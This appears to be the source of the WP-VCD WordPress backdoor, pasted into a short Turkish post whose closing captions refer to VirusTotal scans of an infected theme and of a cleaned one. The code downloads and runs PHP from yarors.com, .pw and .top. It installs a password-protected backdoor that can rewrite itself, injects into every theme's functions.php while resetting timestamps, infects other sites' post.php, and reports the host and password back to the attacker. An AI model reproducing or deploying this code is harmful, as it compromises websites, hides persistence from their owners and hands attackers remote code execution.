@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, " {
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, " }
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='e864caaafae387436ac66d4100771e89';
if (($tmpcontent = @file_get_contents("http://www.yarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.yarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.yarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.yarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>';
$GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media', 'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes');
$GLOBALS['DIR_ARRAY'] = Array();
$dirs = Array();
$search = Array(
Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'),
);
function getDirList($path)
{
if ($dir = @opendir($path))
{
$result = Array();
while (($filename = @readdir($dir)) !== false)
{
if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename))
$result[] = $path . '/' . $filename;
}
return $result;
}
return false;
}
function WP_URL_CD($path)
{
if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
{
if (strpos($file, 'wp-vcd') === false) {
$file = '' . $file;
file_put_contents($path . '/wp-includes/post.php', $file);
//@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
}
}
}
function SearchFile($search, $path)
{
if ($dir = @opendir($path))
{
$i = 0;
while (($filename = @readdir($dir)) !== false)
{
if ($i > MAX_ITERATION) break;
$i++;
if ($filename != '.' && $filename != '..')
{
if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey']))
{
SearchFile($search, $path . '/' . $filename);
}
else
{
foreach ($search as $_)
{
if (strtolower($filename) == strtolower($_['file']))
{
$GLOBALS['DIR_ARRAY'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename);
}
}
}
}
}
}
}
if (is_admin() && (($pagenow == 'themes.php') || ($_GET['action'] == 'activate') || (isset($_GET['plugin']))) ) {
if (isset($_GET['plugin']))
{
global $wpdb ;
}
$install_code = 'if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '{$PASSWORD}'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, " {
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, " }
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='e864caaafae387436ac66d4100771e89';
if (($tmpcontent = @file_get_contents("http://www.yarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.yarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.yarors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.yarors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>';
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else
{
$ping = false;
}
}
}
else
{
$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
$ping2 = true;
}
else
{
//$ping2 = true;
}
}
}
}
}
}
if ($ping) {
$content = @file_get_contents('http://www.yarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
if ($ping2) {
$content = @file_get_contents('http://www.yarors.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.yarors.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
}
for ($i = 0; $i {
$dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1));
}
foreach ($dirs as $dir)
{
foreach (@getDirList($dir) as $__)
{
@SearchFile($search, $__);
}
}
foreach ($GLOBALS['DIR_ARRAY'] as $e)
{
//print_r($e);
if ($file = file_get_contents($e[1]))
{
WP_URL_CD(dirname($e[1]));
if (preg_match('|\'AUTH_SALT\'\s*\,\s*\'(.*?)\'|s', $file, $salt))
{
if ($salt[1] != AUTH_SALT)
{
// WP_URL_CD(dirname($e[1]));
//echo dirname($e[1]);
}
}
}
}
if ($file = @file_get_contents(__FILE__))
{
$file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
$file = preg_replace('!<\?php\s*\?>!s', '', $file);
@file_put_contents(__FILE__, $file);
}
}
//install_code_end
?>
Virüslü tema tarama sonucu:
Virüstotal sonuç
Temizlediğim tema tarama sonucu:
Virüstotal sonuç